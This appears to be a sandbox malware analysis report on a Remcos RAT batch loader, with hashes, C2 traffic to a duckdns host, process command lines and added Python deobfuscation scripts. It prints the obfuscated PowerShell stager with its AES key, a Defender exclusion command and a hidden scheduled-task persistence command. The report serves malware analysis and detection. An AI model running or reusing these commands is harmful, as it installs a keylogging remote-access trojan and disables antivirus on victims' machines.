                                    File Type:DOS batch file, ASCII text, with very long lines (65234), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):602682
                                    Entropy (8bit):6.0096586276122155
                                    Encrypted:false
                                    SSDEEP:12288:q9cYSg8iNuajntoHRPGclDWZMF+BY/TPwcoYIRYhslB06IPaUTj:EcYSg/ucntoHRP5yZjQTHTIjJq
                                    MD5:F01B6515E2BA3FEB16FD0AEE360DD548
                                    SHA1:B4B9E3CED7F77F3F0EC4434C22AC17C8E0449A4D
                                    SHA-256:0AA7625B469A7A8D9AB9F6FDD8A17050F7774AAECED7BA3E4D93FBB4C63E2BD7
                                    SHA-512:8EC5F8EC0D4833ADB0069E6D7766BC01807F0D2C0EDCD3AD4E548C9F558B34051E4F06487D061EF400896AEB8E397C633F4A7E6CE2EEFA1F1C8C9C26BE618C81
                                    Malicious:true
                                    Preview:@echo off..set "dmaPVT=sTYzMJet TYzMJHkTYzMJcbTYzMJ=1TYzMJ TYzMJ&&TYzMJ sTYzMJtTYzMJarTYzMJt "TYzMJ" TYzMJ/mTYzMJiTYzMJn TYzMJ"..set "BLifnJ=&& TYzMJexTYzMJitTYzMJ"..set "pbKzuk=nTYzMJoTYzMJt dTYzMJefiTYzMJneTYzMJdTYzMJ TYzMJHkTYzMJcTYzMJbTYzMJ..if %pbKzuk:TYzMJ=% (%dmaPVT:TYzMJ=%%0 %BLifnJ:TYzMJ=%)..::
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):184
                                    Entropy (8bit):3.33092697063805
                                    Encrypted:false
                                    SSDEEP:3:rhlKl+hNAAfcfcl5JWRal2Jl+7R0DAlBG4phlKl+hNAAfvdlAblovDl6v:6l+8OcfU5YcIeeDAlMl+8OvAbWAv
                                    MD5:1AA568DEA27D823685D2083F40D9B4F8
                                    SHA1:37F3C896835F14550BA2C3D5B65DBFDD7C4148E5
                                    SHA-256:5A87391E52D9B376E73C2B47386BF88C8F956136F3E6AC13715AFDCE440A3633
                                    SHA-512:AFC8EE22B51CB3326561A56CF2856348914DF39D524F98AF528F76BD001211BDFA0DE72688B9F48FA85EFB3F923106AFF6DE620C8568C9DE9CEC1164E4020CD8
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\brotha\logs.dat, Author: Joe Security
                                    Preview:....[.2.0.2.4./.0.4./.2.4. .1.4.:.1.6.:.3.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.4./.2.4. .1.4.:.1.6.:.3.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
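The logs.dat entry above is the Remcos offline keylogger file: UTF-16LE text in which each `[YYYY/MM/DD HH:MM:SS <text>]` header marks either a status message ("Offline Keylogger Started") or the foreground window title ("Program Manager"), with any captured keystrokes following until the next header. The script below is an added example, not part of the Joe Sandbox report or of the sample. It rebuilds the file from the preview (the preview shows every non-printable byte as a dot; no BOM and CRLF terminators are the layout that reproduces the reported 184-byte size), splits it into timestamped entries and returns the digests so the reconstruction can be compared with the MD5/SHA-256 listed above. The regex, the function names and the assumption that keystrokes sit between headers are mine; the preview shows no keystrokes, so the parsed entries carry empty key data.

```python
import hashlib
import re

# Constructed: the logs.dat bytes as implied by the report's preview (UTF-16LE,
# every non-printable byte rendered there as '.') and its reported size of 184 bytes.
# Assumed layout: no BOM, CRLF line terminators.
LOGS_DAT = ("\r\n[2024/04/24 14:16:32 Offline Keylogger Started]\r\n\r\n"
            "[2024/04/24 14:16:33 Program Manager]\r\n").encode("utf-16-le")

# Header lines as seen in the preview: [date time text]. The text is a status
# message or a foreground-window title; keystrokes follow until the next header.
HEADER_RE = re.compile(r"\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) ([^\]\r\n]*)\]")


def decode_log(data):
    """Decode logs.dat as UTF-16LE; tolerate a BOM in case a variant writes one."""
    if data[:2] == b"\xff\xfe":
        data = data[2:]
    return data.decode("utf-16-le")


def parse_remcos_log(data):
    """Return a list of {'time', 'text', 'keys'} entries, 'keys' being whatever was
    captured between this header and the next (empty here: nothing was typed)."""
    text = decode_log(data)
    headers = list(HEADER_RE.finditer(text))
    entries = []
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        entries.append({
            "time": m.group(1),
            "text": m.group(2),
            "keys": text[m.end():end].strip("\r\n"),
        })
    return entries


def file_digests(data):
    """Hashes to compare with the MD5/SHA-256 the report lists for logs.dat."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


if __name__ == "__main__":
    print(len(LOGS_DAT), "bytes")
    for e in parse_remcos_log(LOGS_DAT):
        print(e["time"], "|", e["text"], "|", repr(e["keys"]))
    print(file_digests(LOGS_DAT))
```

If the digests printed by file_digests match the MD5 and SHA-256 given for logs.dat above, the reconstruction is byte-exact; the example itself only checks the length against the reported size. On a real infection the file lives at the path the Yara hit names (C:\Users\user\AppData\Roaming\brotha\logs.dat) and the "keys" fields are the material worth triaging.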
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (2142), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):2144
                                    Entropy (8bit):5.802308578902304
                                    Encrypted:false
                                    SSDEEP:48:sJ5L8jdlk35nKmyjaJmRPRrRxzBnBpSdkrkp4A6xMbJNOt1Wk:2LE3GKDYmxp7zBnBpSoA6xMlNOp
                                    MD5:310FBDD58705C8B0F94B59FDCA73D446
                                    SHA1:3A662D048364CB2C1EE372FC2D7CA60D176EA28D
                                    SHA-256:B017F6D52AAB0EFF266C3F9B351C148CF9662B431CC724A20EE2FF667FFEC50D
                                    SHA-512:8035DCBB605D4488958890EBF9FE28FF9F38D143E4F2694C44DF6209F078597BE5ED0FBCB2CB05E2527CA4C6E8A85EF9501DCB037C40F423050C2DB3C4BE82B6
                                    Malicious:false
                                    Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Secur
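Both the batch loader (the `set "dmaPVT=sTYzMJet ..."` lines in the preview of UrgenteNotificationRef.cmd above) and the dropped PowerShell stager (the `'EntqgNmryqgNm...'.Replace('qgNm', '')` chain in the preview just above) hide their real commands and .NET method names behind a junk token that is only stripped at run time: cmd.exe does it through `%VAR:TYzMJ=%` string substitution, PowerShell through String.Replace. The script below is an added example, not part of the Joe Sandbox report or of the sample. It replays cmd.exe's expansion rules over the preview lines (re-split at the `..` CRLF placeholders the report uses) and collapses the stager's Replace() calls to the literals they yield. The sample inputs are constructed from the two previews, and the regexes and function names are mine; `%%` escapes and delayed `!var!` expansion are not handled.

```python
import re

# Constructed from the report's "File Content Preview" of UrgenteNotificationRef.cmd;
# the preview stops after the "if" line, so this is all the loader it shows.
BATCH_SAMPLE = [
    '@echo off',
    'set "dmaPVT=sTYzMJet TYzMJHkTYzMJcbTYzMJ=1TYzMJ TYzMJ&&TYzMJ sTYzMJtTYzMJarTYzMJt "TYzMJ" TYzMJ/mTYzMJiTYzMJn TYzMJ"',
    'set "BLifnJ=&& TYzMJexTYzMJitTYzMJ"',
    'set "pbKzuk=nTYzMJoTYzMJt dTYzMJefiTYzMJneTYzMJdTYzMJ TYzMJHkTYzMJcTYzMJbTYzMJ',
    'if %pbKzuk:TYzMJ=% (%dmaPVT:TYzMJ=%%0 %BLifnJ:TYzMJ=%)',
]

# Constructed: the first three obfuscated method names from the stager's $EErt list.
PS_SAMPLE = ("$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),"
             "'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),"
             "'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', '')")

# cmd.exe "set" in bare and quoted form. With the quoted form cmd keeps everything
# between the first quote and the last one; a missing closing quote (third set line
# above) is tolerated and the value runs to end of line.
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# %VAR:old=new% (substitution during expansion) and plain %VAR%.
SUBST_RE = re.compile(r'%([^%:=\s]+):([^=%]+)=([^%]*)%')
PLAIN_RE = re.compile(r'%([^%:=\s]+)%')
# 'junk-laden literal'.Replace('junk', '') as emitted by the PowerShell stager.
PS_REPLACE_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*'([^']*)'\)")


def expand(line, env):
    """Expand %VAR:old=new% and %VAR% the way cmd.exe does before running a line.
    Undefined names, including %0/%1 argument references, are left untouched."""
    def subst(m):
        val = env.get(m.group(1).lower())
        return m.group(0) if val is None else val.replace(m.group(2), m.group(3))

    def plain(m):
        val = env.get(m.group(1).lower())
        return m.group(0) if val is None else val

    return PLAIN_RE.sub(plain, SUBST_RE.sub(subst, line))


def deobfuscate_batch(lines):
    """Replay the script line by line: expand first, then record any 'set'.
    Returns the expanded lines and the final variable table."""
    env, out = {}, []
    for raw in lines:
        line = expand(raw.rstrip('\r\n'), env)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)  # cmd variable names are case-insensitive
        out.append(line)
    return out, env


def junk_tokens(lines):
    """Every string the script deletes through a %VAR:old=% substitution."""
    return {m.group(2) for line in lines
            for m in SUBST_RE.finditer(line) if m.group(3) == ''}


def ps_literals(text):
    """The literal each 'x'.Replace('junk', 'new') evaluates to, in order.
    .NET String.Replace is case-sensitive, so str.replace models it correctly."""
    return [m.group(1).replace(m.group(2), m.group(3))
            for m in PS_REPLACE_RE.finditer(text)]


def resolve_ps_replace(text):
    """Rewrite the stager text with every Replace() chain collapsed to its literal."""
    return PS_REPLACE_RE.sub(
        lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", text)


if __name__ == '__main__':
    out, env = deobfuscate_batch(BATCH_SAMPLE)
    print('junk token(s):', junk_tokens(BATCH_SAMPLE))
    for line in out:
        print(line)
    print(resolve_ps_replace(PS_SAMPLE))
```

The expanded last batch line is `if not defined Hkcb (set Hkcb=1 && start "" /min %0 && exit)`: the loader relaunches itself minimized and exits the visible console, the usual first move before the PowerShell stage. The resolved stager literals (EntryPoint, CreateDecryptor, FromBase64String, and further down the preview Load, Decompress, Invoke) are the method names of an AES-decrypt, decompress and reflective-load chain, which is consistent with the `[System.Security.Cryptography.Aes]::Create()` call visible at the end of the preview.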
                                    File type:DOS batch file, ASCII text, with very long lines (65234), with CRLF line terminators
                                    Entropy (8bit):6.0096586276122155
                                    TrID:
                                      File name:UrgenteNotificationRef.cmd
                                      File size:602'682 bytes
                                      MD5:f01b6515e2ba3feb16fd0aee360dd548
                                      SHA1:b4b9e3ced7f77f3f0ec4434c22ac17c8e0449a4d
                                      SHA256:0aa7625b469a7a8d9ab9f6fdd8a17050f7774aaeced7ba3e4d93fbb4c63e2bd7
                                      SHA512:8ec5f8ec0d4833adb0069e6d7766bc01807f0d2c0edcd3ad4e548c9f558b34051e4f06487d061ef400896aeb8e397c633f4a7e6ce2eefa1f1c8c9c26be618c81
                                      SSDEEP:12288:q9cYSg8iNuajntoHRPGclDWZMF+BY/TPwcoYIRYhslB06IPaUTj:EcYSg/ucntoHRP5yZjQTHTIjJq
                                      TLSH:F8D42311D88E2F465BF4DA2A57AF21AB454027B1275CEFF22174604323796835A2FE3F
                                      File Content Preview:@echo off..set "dmaPVT=sTYzMJet TYzMJHkTYzMJcbTYzMJ=1TYzMJ TYzMJ&&TYzMJ sTYzMJtTYzMJarTYzMJt "TYzMJ" TYzMJ/mTYzMJiTYzMJn TYzMJ"..set "BLifnJ=&& TYzMJexTYzMJitTYzMJ"..set "pbKzuk=nTYzMJoTYzMJt dTYzMJefiTYzMJneTYzMJdTYzMJ TYzMJHkTYzMJcTYzMJbTYzMJ..if %pbKzu
                                      Icon Hash:9686878b929a9886
                                      TCP packets
                                      Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                      Apr 24, 2024 14:11:21.877532959 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:22.398708105 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:22.398794889 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:22.402568102 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:23.000241041 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:23.042306900 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:23.485584974 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:23.490055084 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:24.012130976 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:24.012197971 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:24.557024002 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:24.733156919 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:24.734669924 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:25.314954996 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:25.354916096 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:25.498085022 CEST  49739        80         192.168.2.4    178.237.33.50
                                      Apr 24, 2024 14:11:25.797859907 CEST  80           49739      178.237.33.50  192.168.2.4
                                      Apr 24, 2024 14:11:25.797936916 CEST  49739        80         192.168.2.4    178.237.33.50
                                      Apr 24, 2024 14:11:25.798266888 CEST  49739        80         192.168.2.4    178.237.33.50
                                      Apr 24, 2024 14:11:26.104964018 CEST  80           49739      178.237.33.50  192.168.2.4
                                      Apr 24, 2024 14:11:26.106025934 CEST  49739        80         192.168.2.4    178.237.33.50
                                      Apr 24, 2024 14:11:26.118521929 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:26.676220894 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:27.104300976 CEST  80           49739      178.237.33.50  192.168.2.4
                                      Apr 24, 2024 14:11:27.106431961 CEST  49739        80         192.168.2.4    178.237.33.50
                                      Apr 24, 2024 14:11:37.671962023 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:11:37.673557043 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:11:38.252758980 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:12:07.776957035 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      Apr 24, 2024 14:12:07.778776884 CEST  49737        10521      192.168.2.4    45.74.19.121
                                      Apr 24, 2024 14:12:08.377696037 CEST  10521        49737      45.74.19.121   192.168.2.4
                                      UDP packets
                                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                      Apr 24, 2024 14:11:21.642992020 CEST  56474        53         192.168.2.4  1.1.1.1
                                      Apr 24, 2024 14:11:21.875051022 CEST  53           56474      1.1.1.1      192.168.2.4
                                      Apr 24, 2024 14:11:25.339945078 CEST  59187        53         192.168.2.4  1.1.1.1
                                      Apr 24, 2024 14:11:25.493904114 CEST  53           59187      1.1.1.1      192.168.2.4
                                      DNS queries
                                      Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                      Type            Class        DNS over HTTPS
                                      Apr 24, 2024 14:11:21.642992020 CEST  192.168.2.4  1.1.1.1  0x1e42    Standard query (0)  embargogo237.duckdns.org  A (IP address)  IN (0x0001)  false
                                      Apr 24, 2024 14:11:25.339945078 CEST  192.168.2.4  1.1.1.1  0x8a2e    Standard query (0)  geoplugin.net             A (IP address)  IN (0x0001)  false
                                      DNS answers
                                      Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                      CName  Address        Type            Class        DNS over HTTPS
                                      Apr 24, 2024 14:11:21.875051022 CEST  1.1.1.1    192.168.2.4  0x1e42    No error (0)  embargogo237.duckdns.org  -      45.74.19.121   A (IP address)  IN (0x0001)  false
                                      Apr 24, 2024 14:11:25.493904114 CEST  1.1.1.1    192.168.2.4  0x8a2e    No error (0)  geoplugin.net             -      178.237.33.50  A (IP address)  IN (0x0001)  false
                                      • geoplugin.net
                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                      0           192.168.2.4  49739        178.237.33.50   80                7612  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp                             Bytes transferred  Direction  Data
                                      Apr 24, 2024 14:11:25.798266888 CEST  71                 OUT        GET /json.gp HTTP/1.1
                                      Host: geoplugin.net
                                      Cache-Control: no-cache
                                      Apr 24, 2024 14:11:26.104964018 CEST  1173               IN         HTTP/1.1 200 OK
                                      date: Wed, 24 Apr 2024 12:11:25 GMT
                                      server: Apache
                                      content-length: 965
                                      content-type: application/json; charset=utf-8
                                      cache-control: public, max-age=300
                                      access-control-allow-origin: *
                                      Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

                                      Target ID:0
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" "
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:3
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR 
([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:14:10:27
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:14:10:29
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:14:10:29
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:14:10:33
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:14:10:33
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:14:10:39
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:14:10:39
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:14:10:45
                                      Start date:24/04/2024
